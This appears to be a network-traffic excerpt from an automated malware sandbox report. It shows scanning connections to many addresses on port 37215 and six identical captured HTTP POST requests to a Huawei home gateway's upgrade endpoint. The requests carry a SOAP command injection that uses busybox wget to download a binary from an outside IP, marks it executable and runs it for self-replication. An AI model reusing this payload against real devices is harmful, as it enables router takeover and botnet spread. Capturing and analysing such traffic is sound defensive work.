          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.94.125.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.126.47.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.209.250.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.106.179.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.170.131.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 185.74.163.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 63.43.76.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 134.159.69.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.67.62.10:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 72.132.102.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 47.29.97.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.248.110.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.232.114.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 145.100.163.6:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.1.211.10:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.180.179.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 167.149.120.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.197.94.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.248.51.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.239.93.205:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.69.192.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.231.181.234:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.218.51.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.1.15.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.118.178.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.140.211.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.229.42.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.147.158.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.191.211.149:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.126.6.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.136.43.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 110.160.1.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.137.214.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.94.0.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 167.126.51.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.63.239.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.28.220.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.238.170.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.179.251.16:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.154.0.39:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 74.31.120.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.219.26.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 113.14.147.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.17.50.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.221.56.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.174.25.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.196.105.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.204.41.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 165.249.12.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 73.248.0.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.209.144.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 200.50.0.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.240.58.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.128.150.6:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 79.109.207.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.122.224.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 220.32.134.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 195.32.192.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.103.39.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 4.218.1.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 12.122.16.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 182.2.121.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 51.109.240.163:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.174.146.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.128.116.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.238.192.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.147.165.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.234.255.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.183.131.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.202.22.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.95.37.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.243.45.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.1.153.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.7.242.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 180.93.177.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.96.244.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.189.47.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 45.218.85.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.153.35.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 84.226.138.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.30.15.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.104.113.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 160.125.198.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.186.140.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 212.202.86.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.119.137.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.75.44.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 121.184.225.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.246.226.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.178.255.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.107.252.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 40.13.193.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.219.223.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.39.214.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.232.198.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 49.18.130.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.69.30.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.205.66.223:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.86.115.10:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.30.91.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.67.243.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.99.217.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.140.180.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 191.176.230.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.6.201.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.40.31.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 178.46.68.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.161.26.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.20.142.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.80.43.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.65.151.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 62.156.201.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.4.20.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.100.93.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.236.127.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.240.74.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.81.63.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.46.196.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 194.42.64.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.132.188.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 41.38.103.88:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.193.49.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 216.93.117.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.244.203.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.70.135.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 4.232.157.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.247.228.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.252.168.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 197.216.245.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 157.61.22.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:15046 -> 96.16.251.87:37215
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
